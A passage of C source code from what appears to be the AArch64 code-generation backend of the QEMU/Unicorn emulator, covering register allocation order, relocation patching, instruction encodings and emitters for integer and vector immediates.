TCG_REG_X0, TCG_REG_X1, TCG_REG_X2, TCG_REG_X3, TCG_REG_X4, TCG_REG_X5, TCG_REG_X6, TCG_REG_X7, /* X18 reserved by system */ /* X19 reserved for AREG0 */ /* X29 reserved as fp */ /* X30 reserved as temporary */ TCG_REG_V0, TCG_REG_V1, TCG_REG_V2, TCG_REG_V3, TCG_REG_V4, TCG_REG_V5, TCG_REG_V6, TCG_REG_V7, /* V8 - V15 are call-saved, and skipped. */ TCG_REG_V16, TCG_REG_V17, TCG_REG_V18, TCG_REG_V19, TCG_REG_V20, TCG_REG_V21, TCG_REG_V22, TCG_REG_V23, TCG_REG_V24, TCG_REG_V25, TCG_REG_V26, TCG_REG_V27, TCG_REG_V28, TCG_REG_V29, TCG_REG_V30, TCG_REG_V31, }; static const int tcg_target_call_iarg_regs[8] = { TCG_REG_X0, TCG_REG_X1, TCG_REG_X2, TCG_REG_X3, TCG_REG_X4, TCG_REG_X5, TCG_REG_X6, TCG_REG_X7 }; static const int tcg_target_call_oarg_regs[1] = { TCG_REG_X0 }; #define TCG_REG_TMP TCG_REG_X30 #define TCG_VEC_TMP TCG_REG_V31 #ifndef CONFIG_SOFTMMU /* Note that XZR cannot be encoded in the address base register slot, as that actaully encodes SP. So if we need to zero-extend the guest address, via the address index register slot, we need to load even a zero guest base into a register. */ #define USE_GUEST_BASE (guest_base != 0 || TARGET_LONG_BITS == 32) #define TCG_REG_GUEST_BASE TCG_REG_X28 #endif static inline bool reloc_pc26(tcg_insn_unit *code_ptr, tcg_insn_unit *target) { ptrdiff_t offset = target - code_ptr; if (offset == sextract64(offset, 0, 26)) { /* read instruction, mask away previous PC_REL26 parameter contents, set the proper offset, then write back the instruction. */ *code_ptr = deposit32(*code_ptr, 0, 26, offset); return true; } return false; } static inline bool reloc_pc19(tcg_insn_unit *code_ptr, tcg_insn_unit *target) { ptrdiff_t offset = target - code_ptr; if (offset == sextract64(offset, 0, 19)) { *code_ptr = deposit32(*code_ptr, 5, 19, offset); return true; } return false; } static inline bool patch_reloc(tcg_insn_unit *code_ptr, int type, intptr_t value, intptr_t addend) { tcg_debug_assert(addend == 0); switch (type) { case R_AARCH64_JUMP26: case R_AARCH64_CALL26: return reloc_pc26(code_ptr, (tcg_insn_unit *)value); case R_AARCH64_CONDBR19: return reloc_pc19(code_ptr, (tcg_insn_unit *)value); default: g_assert_not_reached(); } } #define TCG_CT_CONST_AIMM 0x100 #define TCG_CT_CONST_LIMM 0x200 #define TCG_CT_CONST_ZERO 0x400 #define TCG_CT_CONST_MONE 0x800 #define TCG_CT_CONST_ORRI 0x1000 #define TCG_CT_CONST_ANDI 0x2000 /* parse target specific constraints */ static const char *target_parse_constraint(TCGArgConstraint *ct, const char *ct_str, TCGType type) { switch (*ct_str++) { case 'r': /* general registers */ ct->ct |= TCG_CT_REG; ct->u.regs |= 0xffffffffu; break; case 'w': /* advsimd registers */ ct->ct |= TCG_CT_REG; ct->u.regs |= 0xffffffff00000000ull; break; case 'l': /* qemu_ld / qemu_st address, data_reg */ ct->ct |= TCG_CT_REG; ct->u.regs = 0xffffffffu; #ifdef CONFIG_SOFTMMU /* x0 and x1 will be overwritten when reading the tlb entry, and x2, and x3 for helper args, better to avoid using them. */ tcg_regset_reset_reg(ct->u.regs, TCG_REG_X0); tcg_regset_reset_reg(ct->u.regs, TCG_REG_X1); tcg_regset_reset_reg(ct->u.regs, TCG_REG_X2); tcg_regset_reset_reg(ct->u.regs, TCG_REG_X3); #endif break; case 'A': /* Valid for arithmetic immediate (positive or negative). */ ct->ct |= TCG_CT_CONST_AIMM; break; case 'L': /* Valid for logical immediate. */ ct->ct |= TCG_CT_CONST_LIMM; break; case 'M': /* minus one */ ct->ct |= TCG_CT_CONST_MONE; break; case 'O': /* vector orr/bic immediate */ ct->ct |= TCG_CT_CONST_ORRI; break; case 'N': /* vector orr/bic immediate, inverted */ ct->ct |= TCG_CT_CONST_ANDI; break; case 'Z': /* zero */ ct->ct |= TCG_CT_CONST_ZERO; break; default: return NULL; } return ct_str; } /* Match a constant valid for addition (12-bit, optionally shifted). */ static inline bool is_aimm(uint64_t val) { return (val & ~0xfff) == 0 || (val & ~0xfff000) == 0; } /* Match a constant valid for logical operations. */ static inline bool is_limm(uint64_t val) { /* Taking a simplified view of the logical immediates for now, ignoring the replication that can happen across the field. Match bit patterns of the forms 0....01....1 0..01..10..0 and their inverses. */ /* Make things easier below, by testing the form with msb clear. */ if ((int64_t)val < 0) { val = ~val; } if (val == 0) { return false; } val += val & -val; return (val & (val - 1)) == 0; } /* Return true if v16 is a valid 16-bit shifted immediate. */ static bool is_shimm16(uint16_t v16, int *cmode, int *imm8) { if (v16 == (v16 & 0xff)) { *cmode = 0x8; *imm8 = v16 & 0xff; return true; } else if (v16 == (v16 & 0xff00)) { *cmode = 0xa; *imm8 = v16 >> 8; return true; } return false; } /* Return true if v32 is a valid 32-bit shifted immediate. */ static bool is_shimm32(uint32_t v32, int *cmode, int *imm8) { if (v32 == (v32 & 0xff)) { *cmode = 0x0; *imm8 = v32 & 0xff; return true; } else if (v32 == (v32 & 0xff00)) { *cmode = 0x2; *imm8 = (v32 >> 8) & 0xff; return true; } else if (v32 == (v32 & 0xff0000)) { *cmode = 0x4; *imm8 = (v32 >> 16) & 0xff; return true; } else if (v32 == (v32 & 0xff000000)) { *cmode = 0x6; *imm8 = v32 >> 24; return true; } return false; } /* Return true if v32 is a valid 32-bit shifting ones immediate. */ static bool is_soimm32(uint32_t v32, int *cmode, int *imm8) { if ((v32 & 0xffff00ff) == 0xff) { *cmode = 0xc; *imm8 = (v32 >> 8) & 0xff; return true; } else if ((v32 & 0xff00ffff) == 0xffff) { *cmode = 0xd; *imm8 = (v32 >> 16) & 0xff; return true; } return false; } /* Return true if v32 is a valid float32 immediate. */ static bool is_fimm32(uint32_t v32, int *cmode, int *imm8) { if (extract32(v32, 0, 19) == 0 && (extract32(v32, 25, 6) == 0x20 || extract32(v32, 25, 6) == 0x1f)) { *cmode = 0xf; *imm8 = (extract32(v32, 31, 1) << 7) | (extract32(v32, 25, 1) << 6) | extract32(v32, 19, 6); return true; } return false; } /* Return true if v64 is a valid float64 immediate. */ static bool is_fimm64(uint64_t v64, int *cmode, int *imm8) { if (extract64(v64, 0, 48) == 0 && (extract64(v64, 54, 9) == 0x100 || extract64(v64, 54, 9) == 0x0ff)) { *cmode = 0xf; *imm8 = (extract64(v64, 63, 1) << 7) | (extract64(v64, 54, 1) << 6) | extract64(v64, 48, 6); return true; } return false; } /* * Return non-zero if v32 can be formed by MOVI+ORR. * Place the parameters for MOVI in (cmode, imm8). * Return the cmode for ORR; the imm8 can be had via extraction from v32. */ static int is_shimm32_pair(uint32_t v32, int *cmode, int *imm8) { int i; for (i = 6; i > 0; i -= 2) { /* Mask out one byte we can add with ORR. */ uint32_t tmp = v32 & ~(0xffu << (i * 4)); if (is_shimm32(tmp, cmode, imm8) || is_soimm32(tmp, cmode, imm8)) { break; } } return i; } /* Return true if V is a valid 16-bit or 32-bit shifted immediate. */ static bool is_shimm1632(uint32_t v32, int *cmode, int *imm8) { if (v32 == deposit32(v32, 16, 16, v32)) { return is_shimm16(v32, cmode, imm8); } else { return is_shimm32(v32, cmode, imm8); } } static int tcg_target_const_match(tcg_target_long val, TCGType type, const TCGArgConstraint *arg_ct) { int ct = arg_ct->ct; if (ct & TCG_CT_CONST) { return 1; } if (type == TCG_TYPE_I32) { val = (int32_t)val; } if ((ct & TCG_CT_CONST_AIMM) && (is_aimm(val) || is_aimm(-val))) { return 1; } if ((ct & TCG_CT_CONST_LIMM) && is_limm(val)) { return 1; } if ((ct & TCG_CT_CONST_ZERO) && val == 0) { return 1; } if ((ct & TCG_CT_CONST_MONE) && val == -1) { return 1; } switch (ct & (TCG_CT_CONST_ORRI | TCG_CT_CONST_ANDI)) { case 0: break; case TCG_CT_CONST_ANDI: val = ~val; /* fallthru */ case TCG_CT_CONST_ORRI: if (val == deposit64(val, 32, 32, val)) { int cmode, imm8; return is_shimm1632(val, &cmode, &imm8); } break; default: /* Both bits should not be set for the same insn. */ g_assert_not_reached(); } return 0; } enum aarch64_cond_code { COND_EQ = 0x0, COND_NE = 0x1, COND_CS = 0x2, /* Unsigned greater or equal */ COND_HS = COND_CS, /* ALIAS greater or equal */ COND_CC = 0x3, /* Unsigned less than */ COND_LO = COND_CC, /* ALIAS Lower */ COND_MI = 0x4, /* Negative */ COND_PL = 0x5, /* Zero or greater */ COND_VS = 0x6, /* Overflow */ COND_VC = 0x7, /* No overflow */ COND_HI = 0x8, /* Unsigned greater than */ COND_LS = 0x9, /* Unsigned less or equal */ COND_GE = 0xa, COND_LT = 0xb, COND_GT = 0xc, COND_LE = 0xd, COND_AL = 0xe, COND_NV = 0xf, /* behaves like COND_AL here */ }; static const enum aarch64_cond_code tcg_cond_to_aarch64[] = { [TCG_COND_EQ] = COND_EQ, [TCG_COND_NE] = COND_NE, [TCG_COND_LT] = COND_LT, [TCG_COND_GE] = COND_GE, [TCG_COND_LE] = COND_LE, [TCG_COND_GT] = COND_GT, /* unsigned */ [TCG_COND_LTU] = COND_LO, [TCG_COND_GTU] = COND_HI, [TCG_COND_GEU] = COND_HS, [TCG_COND_LEU] = COND_LS, }; typedef enum { LDST_ST = 0, /* store */ LDST_LD = 1, /* load */ LDST_LD_S_X = 2, /* load and sign-extend into Xt */ LDST_LD_S_W = 3, /* load and sign-extend into Wt */ } AArch64LdstType; /* We encode the format of the insn into the beginning of the name, so that we can have the preprocessor help "typecheck" the insn vs the output function. Arm didn't provide us with nice names for the formats, so we use the section number of the architecture reference manual in which the instruction group is described. */ typedef enum { /* Compare and branch (immediate). */ I3201_CBZ = 0x34000000, I3201_CBNZ = 0x35000000, /* Conditional branch (immediate). */ I3202_B_C = 0x54000000, /* Unconditional branch (immediate). */ I3206_B = 0x14000000, I3206_BL = 0x94000000, /* Unconditional branch (register). */ I3207_BR = 0xd61f0000, I3207_BLR = 0xd63f0000, I3207_RET = 0xd65f0000, /* AdvSIMD load/store single structure. */ I3303_LD1R = 0x0d40c000, /* Load literal for loading the address at pc-relative offset */ I3305_LDR = 0x58000000, I3305_LDR_v64 = 0x5c000000, I3305_LDR_v128 = 0x9c000000, /* Load/store register. Described here as 3.3.12, but the helper that emits them can transform to 3.3.10 or 3.3.13. */ I3312_STRB = 0x38000000 | LDST_ST << 22 | MO_8 << 30, I3312_STRH = 0x38000000 | LDST_ST << 22 | MO_16 << 30, I3312_STRW = 0x38000000 | LDST_ST << 22 | MO_32 << 30, I3312_STRX = 0x38000000 | LDST_ST << 22 | MO_64 << 30, I3312_LDRB = 0x38000000 | LDST_LD << 22 | MO_8 << 30, I3312_LDRH = 0x38000000 | LDST_LD << 22 | MO_16 << 30, I3312_LDRW = 0x38000000 | LDST_LD << 22 | MO_32 << 30, I3312_LDRX = 0x38000000 | LDST_LD << 22 | MO_64 << 30, I3312_LDRSBW = 0x38000000 | LDST_LD_S_W << 22 | MO_8 << 30, I3312_LDRSHW = 0x38000000 | LDST_LD_S_W << 22 | MO_16 << 30, I3312_LDRSBX = 0x38000000 | LDST_LD_S_X << 22 | MO_8 << 30, I3312_LDRSHX = 0x38000000 | LDST_LD_S_X << 22 | MO_16 << 30, I3312_LDRSWX = 0x38000000 | LDST_LD_S_X << 22 | MO_32 << 30, I3312_LDRVS = 0x3c000000 | LDST_LD << 22 | MO_32 << 30, I3312_STRVS = 0x3c000000 | LDST_ST << 22 | MO_32 << 30, I3312_LDRVD = 0x3c000000 | LDST_LD << 22 | MO_64 << 30, I3312_STRVD = 0x3c000000 | LDST_ST << 22 | MO_64 << 30, I3312_LDRVQ = 0x3c000000 | 3 << 22 | 0 << 30, I3312_STRVQ = 0x3c000000 | 2 << 22 | 0 << 30, I3312_TO_I3310 = 0x00200800, I3312_TO_I3313 = 0x01000000, /* Load/store register pair instructions. */ I3314_LDP = 0x28400000, I3314_STP = 0x28000000, /* Add/subtract immediate instructions. */ I3401_ADDI = 0x11000000, I3401_ADDSI = 0x31000000, I3401_SUBI = 0x51000000, I3401_SUBSI = 0x71000000, /* Bitfield instructions. */ I3402_BFM = 0x33000000, I3402_SBFM = 0x13000000, I3402_UBFM = 0x53000000, /* Extract instruction. */ I3403_EXTR = 0x13800000, /* Logical immediate instructions. */ I3404_ANDI = 0x12000000, I3404_ORRI = 0x32000000, I3404_EORI = 0x52000000, /* Move wide immediate instructions. */ I3405_MOVN = 0x12800000, I3405_MOVZ = 0x52800000, I3405_MOVK = 0x72800000, /* PC relative addressing instructions. */ I3406_ADR = 0x10000000, I3406_ADRP = 0x90000000, /* Add/subtract shifted register instructions (without a shift). */ I3502_ADD = 0x0b000000, I3502_ADDS = 0x2b000000, I3502_SUB = 0x4b000000, I3502_SUBS = 0x6b000000, /* Add/subtract shifted register instructions (with a shift). */ I3502S_ADD_LSL = I3502_ADD, /* Add/subtract with carry instructions. */ I3503_ADC = 0x1a000000, I3503_SBC = 0x5a000000, /* Conditional select instructions. */ I3506_CSEL = 0x1a800000, I3506_CSINC = 0x1a800400, I3506_CSINV = 0x5a800000, I3506_CSNEG = 0x5a800400, /* Data-processing (1 source) instructions. */ I3507_CLZ = 0x5ac01000, I3507_RBIT = 0x5ac00000, I3507_REV16 = 0x5ac00400, I3507_REV32 = 0x5ac00800, I3507_REV64 = 0x5ac00c00, /* Data-processing (2 source) instructions. */ I3508_LSLV = 0x1ac02000, I3508_LSRV = 0x1ac02400, I3508_ASRV = 0x1ac02800, I3508_RORV = 0x1ac02c00, I3508_SMULH = 0x9b407c00, I3508_UMULH = 0x9bc07c00, I3508_UDIV = 0x1ac00800, I3508_SDIV = 0x1ac00c00, /* Data-processing (3 source) instructions. */ I3509_MADD = 0x1b000000, I3509_MSUB = 0x1b008000, /* Logical shifted register instructions (without a shift). */ I3510_AND = 0x0a000000, I3510_BIC = 0x0a200000, I3510_ORR = 0x2a000000, I3510_ORN = 0x2a200000, I3510_EOR = 0x4a000000, I3510_EON = 0x4a200000, I3510_ANDS = 0x6a000000, /* Logical shifted register instructions (with a shift). */ I3502S_AND_LSR = I3510_AND | (1 << 22), /* AdvSIMD copy */ I3605_DUP = 0x0e000400, I3605_INS = 0x4e001c00, I3605_UMOV = 0x0e003c00, /* AdvSIMD modified immediate */ I3606_MOVI = 0x0f000400, I3606_MVNI = 0x2f000400, I3606_BIC = 0x2f001400, I3606_ORR = 0x0f001400, /* AdvSIMD shift by immediate */ I3614_SSHR = 0x0f000400, I3614_SSRA = 0x0f001400, I3614_SHL = 0x0f005400, I3614_USHR = 0x2f000400, I3614_USRA = 0x2f001400, /* AdvSIMD three same. */ I3616_ADD = 0x0e208400, I3616_AND = 0x0e201c00, I3616_BIC = 0x0e601c00, I3616_BIF = 0x2ee01c00, I3616_BIT = 0x2ea01c00, I3616_BSL = 0x2e601c00, I3616_EOR = 0x2e201c00, I3616_MUL = 0x0e209c00, I3616_ORR = 0x0ea01c00, I3616_ORN = 0x0ee01c00, I3616_SUB = 0x2e208400, I3616_CMGT = 0x0e203400, I3616_CMGE = 0x0e203c00, I3616_CMTST = 0x0e208c00, I3616_CMHI = 0x2e203400, I3616_CMHS = 0x2e203c00, I3616_CMEQ = 0x2e208c00, I3616_SMAX = 0x0e206400, I3616_SMIN = 0x0e206c00, I3616_SSHL = 0x0e204400, I3616_SQADD = 0x0e200c00, I3616_SQSUB = 0x0e202c00, I3616_UMAX = 0x2e206400, I3616_UMIN = 0x2e206c00, I3616_UQADD = 0x2e200c00, I3616_UQSUB = 0x2e202c00, I3616_USHL = 0x2e204400, /* AdvSIMD two-reg misc. */ I3617_CMGT0 = 0x0e208800, I3617_CMEQ0 = 0x0e209800, I3617_CMLT0 = 0x0e20a800, I3617_CMGE0 = 0x2e208800, I3617_CMLE0 = 0x2e20a800, I3617_NOT = 0x2e205800, I3617_ABS = 0x0e20b800, I3617_NEG = 0x2e20b800, /* System instructions. */ NOP = 0xd503201f, DMB_ISH = 0xd50338bf, DMB_LD = 0x00000100, DMB_ST = 0x00000200, } AArch64Insn; static inline uint32_t tcg_in32(TCGContext *s) { uint32_t v = *(uint32_t *)s->code_ptr; return v; } /* Emit an opcode with "type-checking" of the format. */ #define tcg_out_insn(S, FMT, OP, ...) \ glue(tcg_out_insn_,FMT)(S, glue(glue(glue(I,FMT),_),OP), ## __VA_ARGS__) static void tcg_out_insn_3303(TCGContext *s, AArch64Insn insn, bool q, TCGReg rt, TCGReg rn, unsigned size) { tcg_out32(s, insn | (rt & 0x1f) | (rn << 5) | (size << 10) | (q << 30)); } static void tcg_out_insn_3305(TCGContext *s, AArch64Insn insn, int imm19, TCGReg rt) { tcg_out32(s, insn | (imm19 & 0x7ffff) << 5 | rt); } static void tcg_out_insn_3201(TCGContext *s, AArch64Insn insn, TCGType ext, TCGReg rt, int imm19) { tcg_out32(s, insn | ext << 31 | (imm19 & 0x7ffff) << 5 | rt); } static void tcg_out_insn_3202(TCGContext *s, AArch64Insn insn, TCGCond c, int imm19) { tcg_out32(s, insn | tcg_cond_to_aarch64[c] | (imm19 & 0x7ffff) << 5); } static void tcg_out_insn_3206(TCGContext *s, AArch64Insn insn, int imm26) { tcg_out32(s, insn | (imm26 & 0x03ffffff)); } static void tcg_out_insn_3207(TCGContext *s, AArch64Insn insn, TCGReg rn) { tcg_out32(s, insn | rn << 5); } static void tcg_out_insn_3314(TCGContext *s, AArch64Insn insn, TCGReg r1, TCGReg r2, TCGReg rn, tcg_target_long ofs, bool pre, bool w) { insn |= 1u << 31; /* ext */ insn |= pre << 24; insn |= w << 23; tcg_debug_assert(ofs >= -0x200 && ofs < 0x200 && (ofs & 7) == 0); insn |= (ofs & (0x7f << 3)) << (15 - 3); tcg_out32(s, insn | r2 << 10 | rn << 5 | r1); } static void tcg_out_insn_3401(TCGContext *s, AArch64Insn insn, TCGType ext, TCGReg rd, TCGReg rn, uint64_t aimm) { if (aimm > 0xfff) { tcg_debug_assert((aimm & 0xfff) == 0); aimm >>= 12; tcg_debug_assert(aimm <= 0xfff); aimm |= 1 << 12; /* apply LSL 12 */ } tcg_out32(s, insn | ext << 31 | aimm << 10 | rn << 5 | rd); } /* This function can be used for both 3.4.2 (Bitfield) and 3.4.4 (Logical immediate). Both insn groups have N, IMMR and IMMS fields that feed the DecodeBitMasks pseudo function. */ static void tcg_out_insn_3402(TCGContext *s, AArch64Insn insn, TCGType ext, TCGReg rd, TCGReg rn, int n, int immr, int imms) { tcg_out32(s, insn | ext << 31 | n << 22 | immr << 16 | imms << 10 | rn << 5 | rd); } #define tcg_out_insn_3404 tcg_out_insn_3402 static void tcg_out_insn_3403(TCGContext *s, AArch64Insn insn, TCGType ext, TCGReg rd, TCGReg rn, TCGReg rm, int imms) { tcg_out32(s, insn | ext << 31 | ext << 22 | rm << 16 | imms << 10 | rn << 5 | rd); } /* This function is used for the Move (wide immediate) instruction group. Note that SHIFT is a full shift count, not the 2 bit HW field. */ static void tcg_out_insn_3405(TCGContext *s, AArch64Insn insn, TCGType ext, TCGReg rd, uint16_t half, unsigned shift) { tcg_debug_assert((shift & ~0x30) == 0); tcg_out32(s, insn | ext << 31 | shift << (21 - 4) | half << 5 | rd); } static void tcg_out_insn_3406(TCGContext *s, AArch64Insn insn, TCGReg rd, int64_t disp) { tcg_out32(s, insn | (disp & 3) << 29 | (disp & 0x1ffffc) << (5 - 2) | rd); } /* This function is for both 3.5.2 (Add/Subtract shifted register), for the rare occasion when we actually want to supply a shift amount. */ static inline void tcg_out_insn_3502S(TCGContext *s, AArch64Insn insn, TCGType ext, TCGReg rd, TCGReg rn, TCGReg rm, int imm6) { tcg_out32(s, insn | ext << 31 | rm << 16 | imm6 << 10 | rn << 5 | rd); } /* This function is for 3.5.2 (Add/subtract shifted register), and 3.5.10 (Logical shifted register), for the vast majorty of cases when we don't want to apply a shift. Thus it can also be used for 3.5.3 (Add/subtract with carry) and 3.5.8 (Data processing 2 source). */ static void tcg_out_insn_3502(TCGContext *s, AArch64Insn insn, TCGType ext, TCGReg rd, TCGReg rn, TCGReg rm) { tcg_out32(s, insn | ext << 31 | rm << 16 | rn << 5 | rd); } #define tcg_out_insn_3503 tcg_out_insn_3502 #define tcg_out_insn_3508 tcg_out_insn_3502 #define tcg_out_insn_3510 tcg_out_insn_3502 static void tcg_out_insn_3506(TCGContext *s, AArch64Insn insn, TCGType ext, TCGReg rd, TCGReg rn, TCGReg rm, TCGCond c) { tcg_out32(s, insn | ext << 31 | rm << 16 | rn << 5 | rd | tcg_cond_to_aarch64[c] << 12); } static void tcg_out_insn_3507(TCGContext *s, AArch64Insn insn, TCGType ext, TCGReg rd, TCGReg rn) { tcg_out32(s, insn | ext << 31 | rn << 5 | rd); } static void tcg_out_insn_3509(TCGContext *s, AArch64Insn insn, TCGType ext, TCGReg rd, TCGReg rn, TCGReg rm, TCGReg ra) { tcg_out32(s, insn | ext << 31 | rm << 16 | ra << 10 | rn << 5 | rd); } static void tcg_out_insn_3605(TCGContext *s, AArch64Insn insn, bool q, TCGReg rd, TCGReg rn, int dst_idx, int src_idx) { /* Note that bit 11 set means general register input. Therefore we can handle both register sets with one function. */ tcg_out32(s, insn | q << 30 | (dst_idx << 16) | (src_idx << 11) | (rd & 0x1f) | (~rn & 0x20) << 6 | (rn & 0x1f) << 5); } static void tcg_out_insn_3606(TCGContext *s, AArch64Insn insn, bool q, TCGReg rd, bool op, int cmode, uint8_t imm8) { tcg_out32(s, insn | q << 30 | op << 29 | cmode << 12 | (rd & 0x1f) | (imm8 & 0xe0) << (16 - 5) | (imm8 & 0x1f) << 5); } static void tcg_out_insn_3614(TCGContext *s, AArch64Insn insn, bool q, TCGReg rd, TCGReg rn, unsigned immhb) { tcg_out32(s, insn | q << 30 | immhb << 16 | (rn & 0x1f) << 5 | (rd & 0x1f)); } static void tcg_out_insn_3616(TCGContext *s, AArch64Insn insn, bool q, unsigned size, TCGReg rd, TCGReg rn, TCGReg rm) { tcg_out32(s, insn | q << 30 | (size << 22) | (rm & 0x1f) << 16 | (rn & 0x1f) << 5 | (rd & 0x1f)); } static void tcg_out_insn_3617(TCGContext *s, AArch64Insn insn, bool q, unsigned size, TCGReg rd, TCGReg rn) { tcg_out32(s, insn | q << 30 | (size << 22) | (rn & 0x1f) << 5 | (rd & 0x1f)); } static void tcg_out_insn_3310(TCGContext *s, AArch64Insn insn, TCGReg rd, TCGReg base, TCGType ext, TCGReg regoff) { /* Note the AArch64Insn constants above are for C3.3.12. Adjust. */ tcg_out32(s, insn | I3312_TO_I3310 | regoff << 16 | 0x4000 | ext << 13 | base << 5 | (rd & 0x1f)); } static void tcg_out_insn_3312(TCGContext *s, AArch64Insn insn, TCGReg rd, TCGReg rn, intptr_t offset) { tcg_out32(s, insn | (offset & 0x1ff) << 12 | rn << 5 | (rd & 0x1f)); } static void tcg_out_insn_3313(TCGContext *s, AArch64Insn insn, TCGReg rd, TCGReg rn, uintptr_t scaled_uimm) { /* Note the AArch64Insn constants above are for C3.3.12. Adjust. */ tcg_out32(s, insn | I3312_TO_I3313 | scaled_uimm << 10 | rn << 5 | (rd & 0x1f)); } /* Register to register move using ORR (shifted register with no shift). */ static void tcg_out_movr(TCGContext *s, TCGType ext, TCGReg rd, TCGReg rm) { tcg_out_insn(s, 3510, ORR, ext, rd, TCG_REG_XZR, rm); } /* Register to register move using ADDI (move to/from SP). */ static void tcg_out_movr_sp(TCGContext *s, TCGType ext, TCGReg rd, TCGReg rn) { tcg_out_insn(s, 3401, ADDI, ext, rd, rn, 0); } /* This function is used for the Logical (immediate) instruction group. The value of LIMM must satisfy IS_LIMM. See the comment above about only supporting simplified logical immediates. */ static void tcg_out_logicali(TCGContext *s, AArch64Insn insn, TCGType ext, TCGReg rd, TCGReg rn, uint64_t limm) { unsigned h, l, r, c; // Unicorn Hack (wtdcode): // I have no clue about this assert and it seems the logic here is same with QEMU at least 7.2.1 // That said, qemu probably suffers the same issue but maybe no one emulates mips on M1? // Disabling this still passes all unit tests so let's go with it. // tcg_debug_assert(is_limm(limm)); h = clz64(limm); l = ctz64(limm); if (l == 0) { r = 0; /* form 0....01....1 */ c = ctz64(~limm) - 1; if (h == 0) { r = clz64(~limm); /* form 1..10..01..1 */ c += r; } } else { r = 64 - l; /* form 1....10....0 or 0..01..10..0 */ c = r - h - 1; } if (ext == TCG_TYPE_I32) { r &= 31; c &= 31; } tcg_out_insn_3404(s, insn, ext, rd, rn, ext, r, c); } static void tcg_out_dupi_vec(TCGContext *s, TCGType type, TCGReg rd, tcg_target_long v64) { bool q = type == TCG_TYPE_V128; int cmode, imm8, i; /* Test all bytes equal first. */ if (v64 == dup_const(MO_8, v64)) { imm8 = (uint8_t)v64; tcg_out_insn(s, 3606, MOVI, q, rd, 0, 0xe, imm8); return; } /* * Test all bytes 0x00 or 0xff second. This can match cases that * might otherwise take 2 or 3 insns for MO_16 or MO_32 below. */ for (i = imm8 = 0; i < 8; i++) { uint8_t byte = v64 >> (i * 8); if (byte == 0xff) { imm8 |= 1 << i; } else if (byte != 0) { goto fail_bytes; } } tcg_out_insn(s, 3606, MOVI, q, rd, 1, 0xe, imm8); return; fail_bytes: /* * Tests for various replications. For each element width, if we * cannot find an expansion there's no point checking a larger * width because we already know by replication it cannot match. */ if (v64 == dup_const(MO_16, v64)) { uint16_t v16 = v64; if (is_shimm16(v16, &cmode, &imm8)) { tcg_out_insn(s, 3606, MOVI, q, rd, 0, cmode, imm8); return; } if (is_shimm16(~v16, &cmode, &imm8)) { tcg_out_insn(s, 3606, MVNI, q, rd, 0, cmode, imm8); return; } /* * Otherwise, all remaining constants can be loaded in two insns: * rd = v16 & 0xff, rd |= v16 & 0xff00. */ tcg_out_insn(s, 3606, MOVI, q, rd, 0, 0x8, v16 & 0xff); tcg_out_insn(s, 3606, ORR, q, rd, 0, 0xa, v16 >> 8); return; } else if (v64 == dup_const(MO_32, v64)) { uint32_t v32 = v64; uint32_t n32 = ~v32; if (is_shimm32(v32, &cmode, &imm8) || is_soimm32(v32, &cmode, &imm8) || is_fimm32(v32, &cmode, &imm8)) { tcg_out_insn(s, 3606, MOVI, q, rd, 0, cmode, imm8); return; } if (is_shimm32(n32, &cmode, &imm8) || is_soimm32(n32, &cmode, &imm8)) { tcg_out_insn(s, 3606, MVNI, q, rd, 0, cmode, imm8); return; } /* * Restrict the set of constants to those we can load with * two instructions. Others we load from the pool. */ i = is_shimm32_pair(v32, &cmode, &imm8); if (i) { tcg_out_insn(s, 3606, MOVI, q, rd, 0, cmode, imm8); tcg_out_insn(s, 3606, ORR, q, rd, 0, i, extract32(v32, i * 4, 8)); return; } i = is_shimm32_pair(n32, &cmode, &imm8); if (i) { tcg_out_insn(s, 3606, MVNI, q, rd, 0, cmode, imm8); tcg_out_insn(s, 3606, BIC, q, rd, 0, i, extract32(n32, i * 4, 8)); return; } } else if (is_fimm64(v64, &cmode, &imm8)) { tcg_out_insn(s, 3606, MOVI, q, rd, 1, cmode, imm8); return; } /* * As a last resort, load from the constant pool. Sadly there * is no LD1R (literal), so store the full 16-byte vector. */ if (type == TCG_TYPE_V128) { new_pool_l2(s, R_AARCH64_CONDBR19, s->code_ptr, 0, v64, v64); tcg_out_insn(s, 3305, LDR_v128, 0, rd); } else { new_pool_label(s, v64, R_AARCH64_CONDBR19, s->code_ptr, 0); tcg_out_insn(s, 3305, LDR_v64, 0, rd); } } static bool tcg_out_dup_vec(TCGContext *s, TCGType type, unsigned vece, TCGReg rd, TCGReg rs) { int is_q = type - TCG_TYPE_V64; tcg_out_insn(s, 3605, DUP, is_q, rd, rs, 1 << vece, 0); return true; } static bool tcg_out_dupm_vec(TCGContext *s, TCGType type, unsigned vece, TCGReg r, TCGReg base, intptr_t offset) { TCGReg temp = TCG_REG_TMP; if (offset < -0xffffff || offset > 0xffffff) { tcg_out_movi(s, TCG_TYPE_PTR, temp, offset); tcg_out_insn(s, 3502, ADD, 1, temp, temp, base); base = temp; } else { AArch64Insn add_insn = I3401_ADDI; if (offset < 0) { add_insn = I3401_SUBI; offset = -offset; } if (offset & 0xfff000) { tcg_out_insn_3401(s, add_insn, 1, temp, base, offset & 0xfff000); base = temp; } if (offset & 0xfff) { tcg_out_insn_3401(s, add_insn, 1, temp, base, offset & 0xfff); base = temp; } } tcg_out_insn(s, 3303, LD1R, type == TCG_TYPE_V128, r, base, vece); return true; } static void tcg_out_movi(TCGContext *s, TCGType type, TCGReg rd, tcg_target_long value) { tcg_target_long svalue = value; tcg_target_long ivalue = ~value; tcg_target_long t0, t1, t2; int s0, s1; AArch64Insn opc; switch (type) { case TCG_TYPE_I32: case TCG_TYPE_I64: tcg_debug_assert(rd < 32); break; case TCG_TYPE_V64: case TCG_TYPE_V128: tcg_debug_assert(rd >= 32); tcg_out_dupi_vec(s, type, rd, value); return; default: g_assert_not_reached(); } /* For 32-bit values, discard potential garbage in value. For 64-bit values within [2**31, 2**32-1], we can create smaller sequences by interpreting this as a negative 32-bit number, while ensuring that the high 32 bits are cleared by setting SF=0. */ if (type == TCG_TYPE_I32 || (value & ~0xffffffffull) == 0) { svalue = (int32_t)value; value = (uint32_t)value; ivalue = (uint32_t)ivalue; type = TCG_TYPE_I32; } /* Speed things up by handling the common case of small positive and negative values specially. */ if ((value & ~0xffffull) == 0) { tcg_out_insn(s, 3405, MOVZ, type, rd, value, 0); return; } else if ((ivalue & ~0xffffull) == 0) { tcg_out_insn(s, 3405, MOVN, type, rd, ivalue, 0); return; } /* Check for bitfield immediates. For the benefit of 32-bit quantities, use the sign-extended value. That lets us match rotated values such as 0xff0000ff with the same 64-bit logic matching 0xffffffffff0000ff. */ if (is_limm(svalue)) { tcg_out_logicali(s, I3404_ORRI, type, rd, TCG_REG_XZR, svalue); return; } 